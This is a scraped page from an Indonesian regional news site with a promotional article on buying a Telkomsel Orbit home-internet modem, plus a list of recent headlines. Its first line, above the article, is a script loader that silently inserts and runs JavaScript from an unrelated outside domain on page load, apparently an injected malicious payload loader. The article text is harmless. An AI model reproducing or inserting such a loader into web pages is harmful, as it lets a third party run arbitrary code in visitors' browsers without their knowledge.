(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Teknologi

Kemudahan Beli Modem Telkomsel untuk Internet Berkualitas!


KANALKALIMANTAN.COM – Tanpa disadari kebutuhan internet di saat pandemi Covid-19 semakin meningkat. Banyaknya kegiatan yang telah dialihkan menjadi Work from Home (WFH) menuntut Anda untuk menyediakan provider internet rumah sendiri agar koneksi berjalan dengan lancar. Nah, sebagai solusi Anda bisa beli modem Telkomsel untuk meningkatkan kualitas internet rumah Anda.

Telkomsel merupakan provider internet dengan pengguna paling banyak di Indonesia, sehingga Anda tidak perlu heran jika Anda menemukan pengguna telkomsel ini dimana-mana, mulai dari sabang hingga Merauke. Masyarakat Indonesia juga sudah banyak yang menggunakan produk dari Telkomsel seperti SimPATI, AS, HALO, dan ByU untuk berlangganan paket internetan.

Telkomsel selalu berusaha menciptakan serta mengembangkan produk-produknya agar dihasilkan kecepatan internet yang lebih stabil, hingga akhirnya berhasil meluncurkan telkomsel orbit yang ditujukan khusus untuk internet rumahan dan tentunya dengan koneksi yang cepat dan stabil.

Telkomsel merupakan provider internet dengan pengguna paling banyak di Indonesia. Foto: dok.telkomsel

 

 

Cara Beli Modem Telkomsel Orbit yang Super Mudah

Telkomsel orbit merupakan layanan digital yang berbasis nirkabel dan bersifat portable. Modem ini tidak hanya efektif untuk internet rumahan, tetapi juga bisa dibawa bepergian. Berbagai kemudahan telah ditawarkan modem orbit ini agar Anda bisa lebih mudah mengakses internet. Lalu, bagaimana cara melakukan pembelian modem telkomsel orbit? Anda bisa simak langkah dibawah ini:

  1. Pembelian Via Website

Anda bisa kunjungi website https://www.myorbit.id/id. Jika ingin mendapatkan keuntungan Anda bisa gunakan kode referral dan kode promo dari teman yang sudah pernah membeli modem orbit ini. Anda bisa dapatkan potongan harga dan bahkan juga bonus kuota. Namun sebelum Anda membeli modem ini, anda harus ikuti terlebih dahulu cara ini:

Lakukan pengecekan jaringan telkomsel orbit di wilayah Anda agar bisa dipastikan bahwa telkomsel orbit memang sudah tersedia sehingga performanya juga sangat baik jika digunakan

Jika wilayah Anda terjangkau oleh telkomsel orbit, Anda bisa pilih jenis modem yang diingin. Modem orbit ini terdiri dari empat varian yang berbeda, antara lain; orbit star lite, orbit star 2, orbit max, dan orbit pro. Perbedaan keempatnya dapat Anda lihat dari spesifikasinya masing-masing

  1. Pembelian via e-commerce

Anda juga bisa beli modem telkomsel orbit dengan melakukan pembelian secara online. Apalagi disaat pandemic seperti ini mengharuskan Anda untuk tetap di rumah, maka Anda bisa beli modem telkomsel lewat marketplace yang tersedia seperti Shopee, Tokopedia, Blibli, JD.id, Lazada, dan Bukalapak.

Kelebihan membeli online ini adalah Anda bisa mendapatkan bermacam-macam metode pembayaran dan bisa dipilih sesuai keinginan. Tak hanya itu, Anda juga bisa pilih promo-promo yang disediakan oleh masing-masing marketplace sehingga bisa menghemat pengeluaran Anda.

Anda harus memastikan bahwa modem telkomsel dibeli dari official store agar Anda bisa dapatkan jaminan garansi jika terjadi kerusakan di kemudian hari. Sebab, jika Anda beli di toko yang tidak resmi Anda belum tentu bisa dapatkan garansi, apalagi jika Anda sudah membayar dengan harga tinggi.

  1. Pembelian ke GraPARI Telkomsel

Tak hanya itu, bagi Anda yang ingin langsung melihat barangnya, Anda juga bisa kunjungi GraPARI. Saat ini, GraPARI telah menyediakan metode yang disebut pembelian Online to Offline atau O2O. Maksudnya Anda bisa lakukan pembelian di website resmi https://www.myorbit.id/id, namun Anda juga bisa mengambil barangnya langsung di GraPARI.

Layanan GraPARI kini juga telah tersedia di berbagai kota di Indonesia, sehingga Anda bisa kunjungi GraPARI yang paling dekat dengan rumah Anda. Keuntungan lain yang Anda dapatkan jika datang ke GraPARI adalah Anda akan disuguhkan dengan demonstrasi unit modem telkomsel orbit sehingga Anda juga bisa melihat layanannya seperti apa.

Demikianlah informasi yang bisa disajikan untuk Anda jika berminat beli modem telkomsel orbit. Diharapkan dengan informasi ini, Anda bisa mendapatkan modem berkualitas yaitu Telkomsel Orbit dengan cepat, praktis, dan mudah ya. Dengan begitu, semua kegiatan Anda bisa ditunjang dengan internet yang berkualitas!. (kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Al Ghifari

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

4 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

5 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

5 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

5 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

9 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

11 jam ago

This website uses cookies.